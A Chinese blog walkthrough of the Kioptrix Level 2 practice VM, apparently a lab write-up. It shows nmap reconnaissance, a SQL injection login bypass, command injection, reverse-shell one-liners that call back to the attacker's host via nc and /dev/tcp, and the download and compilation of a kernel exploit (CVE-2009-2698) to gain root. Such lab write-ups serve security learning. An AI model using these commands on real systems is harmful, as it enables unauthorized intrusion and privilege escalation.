学习笔记-Kioptrix2-WalkThrough

最新推荐文章于 2024-02-27 15:01:09 发布
最新推荐文章于 2024-02-27 15:01:09 发布
阅读量146 收藏
点赞数
文章标签: 学习 linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_35360663/article/details/127668687
版权

Kioptrix2-WalkThrough

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

靶机地址

Description

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Source: http://www.kioptrix.com/blog/?page_id=135

Source: http://www.kioptrix.com/blog/?p=49

This is the second release of #2. First release had a bug in it with the web application

2012/Feb/09: Re-releases

2011/Feb/11: Original Release

知识点

  • SQL 注入
  • 命令执行
  • CVE-2009-2698

实验环境

环境仅供参考

  • VMware® Workstation 15 Pro - 15.0.0 build-10134415
  • kali : NAT 模式,192.168.141.134
  • 靶机 : NAT 模式

前期-信息收集

开始进行 IP 探活

nmap -sP 192.168.141.0/24

排除法,去掉自己、宿主机、网关, 192.168.141.145 就是目标了

扫描开放端口

nmap -T5 -A -v -p- 192.168.141.145

开放端口数蛮多的,SSH、http、https、Mysql,还有一个较为少见的 631,运行的 CUPS 服务,CUPS 也有许多漏洞

这里 nmap 扫描 mysql 提示未授权,不过我测试并不能连接,从 web 先入手

中期-漏洞利用

看着就像有 SQL 注入的样子,随便试了下注入就进去了

账号 随便
密码 1' or '1'='1

看起来有个命令注入,简单尝试发现没有过滤

;ip a

下面直接回弹 shell,kali 监听

nc -lvp 4444

执行命令

;nc -nv 192.168.141.134 4444 -e /bin/bash

没成功,估计没有 nc,试试直接 bash 回弹

;bash -i >& /dev/tcp/192.168.141.134/4444 0>&1

回弹成功,果然没有 nc 程序,下面测试提权

后期-提权

简单收集下信息

cat /etc/*-release
uname -a

centos 4.5,可以试试 CVE-2009-2698,https://www.exploit-db.com/exploits/9542

这里直接靶机下载或kali下载再传上去都行,自选

kali 下载完启 HTTP

wget https://www.exploit-db.com/download/9542
mv 9542 9542.c
python -m SimpleHTTPServer 8080

靶机下载 kali 上的 poc

cd /tmp
wget 192.168.141.134:8080/9542.c
gcc 9542.c
ls
./a.out

提权成功,感谢 Kioptrix Team 制作靶机

点击关注,共同学习!安全狗的自我修养

github haidragon

https://github.com/haidragon

C-haidragon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Vunlhub靶场 Kioptrix 2
m0_57221101的博客
02-18 445
这台靶机的搭建很简单,直接用vmware打开vmx文件就可以了 勘探 nmap探查 port 备注 22 openssh 3.9p1 80 apache 2.052 111 rcp 443 631 ipp 3306 sql 80web 443同80 进入发现是一个登陆界面 dirsearch发现了几个目录 python3.9 dirsearch.py -u 192.168.1.105 [20:34:57] 200
Kioptrix: Level 1.1 (#2)
战神/calmness的博客
06-04 941
下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 目标机器:192.168.243.147 攻击机器:192.168.210.134 目录 信息收集 万能和密码破解 命令执行 反弹shell 监听 提权 版本内核 linux 2.6.9 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (proto...
Kioptrix2-WalkThrough 靶机复现
m0_46799123的博客
10-18 198
靶机地址 Kioptrix: Level 1.1 (#2) ~ VulnHub 环境说明 kali: net模式 ip 192.168.149.145 靶机:net模式 ip DHCP 信息收集阶段 1. 开始进行 IP 探活 nmap -sP 192.168.149.0/24 2. 通过排除法确定靶机ip为192.168.149.158,扫描其开放的端口 3. 发现其开放的端口主要有Mysql、SSH、http等;有web约等于有了一切 进行踩点,访问其80端口,发现是一个登录
vulnhub之Kioptrix Level 2
li1136594919的博客
06-09 396
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机。
Kioptrix Level2
底层社会中的弱智
04-16 888
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
Kioptrix_level_2 新手入门攻略
qq_58683895的博客
09-16 182
使用命令注入及漏洞提权攻略靶机,过程较为完整
JSP学习笔记-2.pdf
11-28
JSP学习笔记-2.pdf
autokeras学习笔记-安装篇
最新发布
06-07
autokeras学习笔记-安装篇
android学习笔记-clip.pdf
11-15
android学习笔记-clip.pdf
笔记-webpack5学习指南-V1.0
08-29
笔记-webpack5学习指南-V1.0
Vue2学习笔记-前端开发
03-03
Vue2学习笔记-前端开发
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
项目三 探索并利用漏洞对未知web server权限提升(CTF实战 Kioptrix#2靶机渗透测试)
王先生的蒋小姐的博客
07-20 1344
大家好,我是SuieKa。此是实训项目三,要求根据未知靶机(Kioptrix#2)探索漏洞,并利用漏洞进行权限提升实验项目,希望对朋友们有所帮助。 树一、神器开路,对未知操作系统的全面扫描二、利用探索的漏洞获取shell三、权限提升并获取关键字(hiroshima) 所谓CTF:CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交
【Oscp备考-Kioptrix2
weixin_44126257的博客
09-16 1919
Oscp备考:Kioptrix Level 2
Kioptrix2(内核漏洞9545.c)
m0_66299232的博客
10-27 700
2.用' or 1=1#登录进来后,是一个ping命令行。3.直接尝试反弹shell 用nc反弹不成功,用bash。5.本地开启http服务,用wget命令将程序下载到靶机。2.用nmap扫出的内核比较低,所以肯定有内核漏洞。攻击机系统:kali linux 2021.1。1.用nmap探测目标靶机开放端口和服务情况。1.访问首页是一个登录界面,SQL注入漏洞。3.找到一个c程序9545.c。6.用gcc编译后,提权成功。虚拟机网络链接模式:桥接模式。1.进去后,没找到可利用信息。用uname -a确定。
Kioptrix Level 2入门级详细教程&小白也能看懂!
jockerboss的博客
02-27 960
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1223
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
KIOPTRIX: LEVEL 2通关详解
arcuied
04-02 206
KIOPTRIX: LEVEL 2通关详解
OSCP Learning Notes - Capstone(1)
weixin_30845171的博客
08-03 1909
Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine from the following website: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ The target server: Kioptirx Level 1...
python学习笔记--皮大庆
08-14
《Python学习笔记》是由皮大庆编写的一本关于Python语言学习的教材。在这本书中,作者详细介绍了Python语言的基础知识、语法规则以及常用的编程技巧。 首先,作者简要介绍了Python语言的特点和优势。他提到,Python...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C-haidragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值